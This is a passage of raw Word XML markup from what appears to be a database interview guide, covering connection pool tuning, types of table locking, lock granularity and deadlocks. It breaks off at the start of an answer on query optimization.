        <w:t>Set the connection pool size based on the expected load and database server capacity. A pool that is too small can lead to connection contention, while a pool that is too large can overwhelm the database server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78B974BB" w14:textId="77777777" w:rsidR="00395544" w:rsidRPr="00DA2F32" w:rsidRDefault="00395544" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="423"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Connection Timeout</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DC02D81" w14:textId="77777777" w:rsidR="00395544" w:rsidRPr="00DA2F32" w:rsidRDefault="00395544" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="423"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Configure timeouts for idle connections to prevent resource wastage and to close connections that are no longer needed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="509EAC91" w14:textId="77777777" w:rsidR="00395544" w:rsidRPr="00DA2F32" w:rsidRDefault="00395544" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="423"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Error Handling</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="724F1682" w14:textId="77777777" w:rsidR="00395544" w:rsidRPr="00DA2F32" w:rsidRDefault="00395544" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="423"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Implement error handling to gracefully manage situations where the pool is exhausted or where connections fail.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F1F5F47" w14:textId="77777777" w:rsidR="00395544" w:rsidRPr="00DA2F32" w:rsidRDefault="00395544" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="423"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Monitoring</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51970FEB" w14:textId="77777777" w:rsidR="00395544" w:rsidRPr="00DA2F32" w:rsidRDefault="00395544" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="423"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Monitor the performance of the connection pool, including the number of active, idle, and queued connections, to ensure the pool is operating efficiently.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3129C90A" w14:textId="77777777" w:rsidR="00135B2C" w:rsidRPr="00DA2F32" w:rsidRDefault="00135B2C" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1FAAAEAF" w14:textId="2B125854" w:rsidR="00D246F0" w:rsidRPr="00DA2F32" w:rsidRDefault="009A2163" w:rsidP="009E0607">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="132" w:name="_Toc178383315"/>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>What is table locking, give me some types of locking</w:t>
      </w:r>
      <w:bookmarkEnd w:id="132"/>
    </w:p>
    <w:p w14:paraId="13785EB7" w14:textId="77777777" w:rsidR="003B67BB" w:rsidRPr="00DA2F32" w:rsidRDefault="003B67BB" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Table locking</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a database management mechanism that controls concurrent access to a table to ensure data consistency and prevent conflicts between transactions. When a lock is applied to a table, it restricts the type of operations other transactions can perform on that table until the lock is released.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BD63E51" w14:textId="77777777" w:rsidR="003B67BB" w:rsidRPr="00DA2F32" w:rsidRDefault="003B67BB" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Types of Table Locking</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="352166DE" w14:textId="77777777" w:rsidR="003B67BB" w:rsidRPr="00DA2F32" w:rsidRDefault="003B67BB" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="424"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Shared Lock (Read Lock)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D742A63"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Allows multiple transactions to read from the table but prevents any transaction from writing to it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C8B0CB4"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Scenario</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Used when a transaction needs to read data without modifying it. Multiple transactions can hold shared locks simultaneously as long as no exclusive locks are held.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D732F15"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Multiple users querying data for reporting purposes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16E1FC5E" w14:textId="77777777" w:rsidR="003B67BB" w:rsidRPr="00DA2F32" w:rsidRDefault="003B67BB" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="424"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Exclusive Lock (Write Lock)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="769B5D6A"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Prevents any other transactions from reading or writing to the table until the lock is released.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="415B9F59"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Scenario</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Used when a transaction needs to modify data, such as performing an UPDATE or DELETE. This lock ensures that no other transaction can read or modify the data concurrently.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72FCEC46"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lastRenderedPageBreak/>
        <w:t>Example</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: An update operation on a customer record where no other operations can interfere until the update is complete.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C013C8D" w14:textId="77777777" w:rsidR="003B67BB" w:rsidRPr="00DA2F32" w:rsidRDefault="003B67BB" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="424"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Intent Locks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="067CE8A2"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Indicate a transaction’s intention to acquire a more restrictive lock (like an exclusive lock) on a specific part of a table.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00F548A0"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Types</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CEFD753" w14:textId="77777777" w:rsidR="003B67BB" w:rsidRPr="00DA2F32" w:rsidRDefault="003B67BB" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="424"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Intent Shared Lock (IS)</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Shows the intention to acquire a shared lock on specific rows within a table.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="782463A4" w14:textId="77777777" w:rsidR="003B67BB" w:rsidRPr="00DA2F32" w:rsidRDefault="003B67BB" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="424"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Intent Exclusive Lock (IX)</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Indicates the intention to acquire an exclusive lock on specific rows within a table.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="270F83BD" w14:textId="77777777" w:rsidR="003B67BB" w:rsidRPr="00DA2F32" w:rsidRDefault="003B67BB" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="424"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Shared Intent Exclusive Lock (SIX)</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Indicates a shared lock on the entire table with the intention to acquire exclusive locks on some rows.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="193DB890"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Scenario</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Used to prevent deadlocks and ensure locking strategies do not conflict with each other.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FDE2A0D" w14:textId="77777777" w:rsidR="003B67BB" w:rsidRPr="00DA2F32" w:rsidRDefault="003B67BB" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="424"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Row-Level Locking</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39002856"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Locks specific rows rather than the entire table, which allows for greater concurrency.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56184F92"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Scenario</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Used when only a few rows need to be updated or read, allowing other rows in the table to remain accessible.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DB17631"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Updating a single customer record in a large table while other transactions can still access other records.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C10340F" w14:textId="77777777" w:rsidR="003B67BB" w:rsidRPr="00DA2F32" w:rsidRDefault="003B67BB" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="424"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Page-Level Locking</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34A9D979"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Locks a page, which is a set of rows within a table.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7308CF5F"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Scenario</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Strikes a balance between row-level and table-level locking, locking a page instead of individual rows to reduce overhead while allowing some level of concurrency.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3408563D"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Accessing or updating multiple contiguous rows within a table.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EE13D33" w14:textId="77777777" w:rsidR="003B67BB" w:rsidRPr="00DA2F32" w:rsidRDefault="003B67BB" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="424"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Table-Level Locking</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61F59B9A"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Locks the entire table, preventing other transactions from accessing it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="265F4720"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Scenario</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Used for operations that require exclusive access to the entire table, such as large batch updates or schema modifications.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30386AD8" w14:textId="77777777" w:rsidR="003B67BB" w:rsidRPr="00DA2F32" w:rsidRDefault="003B67BB" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="42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Performing maintenance operations that require the entire table to be locked.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F67C099" w14:textId="77777777" w:rsidR="003B67BB" w:rsidRPr="00DA2F32" w:rsidRDefault="003B67BB" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Considerations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A54AF82" w14:textId="77777777" w:rsidR="003B67BB" w:rsidRPr="00DA2F32" w:rsidRDefault="003B67BB" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="425"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Lock Granularity</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: The choice between different types of locking (row-level, page-level, table-level) affects concurrency and performance. Fine-grained locks like row-level allow for more concurrency but may have higher management overhead. Coarse-grained locks like table-level reduce overhead but can limit concurrency.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DDDE6DE" w14:textId="77777777" w:rsidR="003B67BB" w:rsidRPr="00DA2F32" w:rsidRDefault="003B67BB" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="425"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Deadlocks</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Occur when transactions are waiting for each other to release locks, causing a standstill. Databases typically include mechanisms to detect and resolve deadlocks by rolling back one of the conflicting transactions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DB923D8" w14:textId="77777777" w:rsidR="00135B2C" w:rsidRPr="00DA2F32" w:rsidRDefault="00135B2C" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="67814296" w14:textId="6C52BD2D" w:rsidR="00135B2C" w:rsidRPr="00DA2F32" w:rsidRDefault="009A2163" w:rsidP="009E0607">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="133" w:name="_Toc178383316"/>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>What is query optimization, and why is it important in database systems</w:t>
      </w:r>
      <w:bookmarkEnd w:id="133"/>
    </w:p>
    <w:p w14:paraId="5CABD369" w14:textId="77777777" w:rsidR="00A8106D" w:rsidRPr="00DA2F32" w:rsidRDefault="00A8106D" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Query optimization</w:t>
      </w:r>
